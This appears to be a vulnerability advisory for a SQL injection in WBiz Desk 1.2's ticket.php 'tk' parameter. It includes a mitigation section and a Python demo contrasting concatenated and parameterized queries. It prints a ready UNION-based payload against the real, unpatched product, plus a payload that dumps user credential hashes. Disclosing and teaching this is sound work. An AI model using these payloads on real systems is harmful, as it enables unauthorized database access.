Vendor: WBiz Desk
By: h4ck3r - Faisal Albuloushi
CVSS: 6.4 (MEDIUM)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: WBiz Desk
Affected Version From: WBiz Desk 1.2
Affected Version To: WBiz Desk 1.2
Patch Exists: NO
Related CWE:
CPE: a:wbiz_desk:wbiz_desk:1.2
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2023

WBiz Desk 1.2 – SQL Injection

WBiz Desk 1.2 is vulnerable to SQL injection in the 'tk' parameter of the 'ticket.php' page. The parameter value is placed into a SQL query without parameterization or validation, so an attacker holding an ordinary (non-admin) user account can append their own SQL to the ticket lookup, for example a UNION SELECT that returns data from other tables, and read from the application's database.

Mitigation:

The fix is to stop building the query from the raw request value: pass 'tk' to the database as a bound parameter of a prepared statement (PDO or mysqli in PHP) so it is treated as data rather than as query text. As a second layer, validate the parameter before the query runs (a ticket identifier should be a positive integer, so anything else can be rejected outright). Escaping the value is a weaker substitute for parameterization and should not be relied on alone.

Exploit-DB raw data:

[#] Exploit Title: WBiz Desk 1.2 - SQL Injection
[#] Exploit Date: May 12, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: WBiz Desk
[#] Application Version: 1.2
[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system


[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech


[#] 3xploit:

[path]/ticket.php?tk=[SQL Injection]


[#] 3xample:

[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -


[#] Notes:
- The vulnerability requires a non-admin (normal) user account to be exploited.
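
The following is an added example, not code from WBiz Desk or from the exploit author, showing how the UNION-based payload above works against a query built by string concatenation and why the mitigation (a bound parameter) defeats it. It runs against an in-memory SQLite database with a constructed, assumed schema (WBiz Desk's real tables and columns are not on the page), and the payload is adapted to SQLite: four columns instead of the sixteen the real target needs, the `||` operator in place of MySQL's CONCAT(), and plain string markers in place of the hex literals (0x716b6a6b71 decodes to `qkjkq`, 0x71626b6b71 to `qbkkq`). The function and table names are illustrative.

```python
import sqlite3

# Constructed stand-in for the help-desk database. The real WBiz Desk schema is not on
# the page, so the tables, columns and rows below are assumptions for the demonstration.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE tickets (id INTEGER, subject TEXT, body TEXT, status TEXT);
        CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT, role TEXT);
        INSERT INTO tickets VALUES (83, 'Printer offline', 'Floor 2 printer is down', 'open');
        INSERT INTO tickets VALUES (84, 'VPN access', 'New hire needs VPN', 'closed');
        INSERT INTO users VALUES (1, 'admin', '$2y$10$examplehash', 'admin');
        INSERT INTO users VALUES (2, 'alice', '$2y$10$anotherhash', 'user');
        """
    )
    return conn


def ticket_vulnerable(conn: sqlite3.Connection, tk: str) -> list:
    """Query built by string concatenation: whatever arrives in ?tk= becomes SQL text.
    This mirrors the class of bug the advisory describes, not the app's actual code."""
    sql = f"SELECT id, subject, body, status FROM tickets WHERE id = '{tk}'"
    return conn.execute(sql).fetchall()


def ticket_safe(conn: sqlite3.Connection, tk: str) -> list:
    """Same lookup with a bound parameter: the value is data, never part of the query."""
    sql = "SELECT id, subject, body, status FROM tickets WHERE id = ?"
    return conn.execute(sql, (tk,)).fetchall()


# Probe adapted from the page's payload: 4 columns instead of 16, '||' in place of MySQL's
# CONCAT(), plain strings where the original uses hex literals. The markers bracket the
# injected value so the attacker can find which column the page echoes back.
PROBE = "83' UNION ALL SELECT NULL,NULL,'qkjkq'||sqlite_version()||'qbkkq',NULL-- -"

# Once the echoed column is known, the same UNION reads rows from an unrelated table.
# A non-existent ticket id (0) keeps the legitimate row out of the result.
DUMP = "0' UNION ALL SELECT NULL,username,password_hash,role FROM users-- -"


def between_markers(rows: list, start: str = "qkjkq", end: str = "qbkkq"):
    """Return the text bracketed by the markers, from whichever row and column it landed in."""
    for row in rows:
        for cell in row:
            if isinstance(cell, str) and cell.startswith(start) and cell.endswith(end):
                return cell[len(start):-len(end)]
    return None


if __name__ == "__main__":
    conn = make_db()
    print("probe echoes:", between_markers(ticket_vulnerable(conn, PROBE)))
    print("dumped users:", ticket_vulnerable(conn, DUMP))
    print("parameterized:", ticket_safe(conn, PROBE), ticket_safe(conn, "83"))
```

With the concatenated query the probe returns the database version between the markers and the second payload returns every row of the users table; with the bound parameter the same payload string is compared as a literal ticket id, matches nothing, and the ordinary lookup for "83" still works. The `-- -` tail comments out the closing quote the application appends, which is why the payload on the page ends that way.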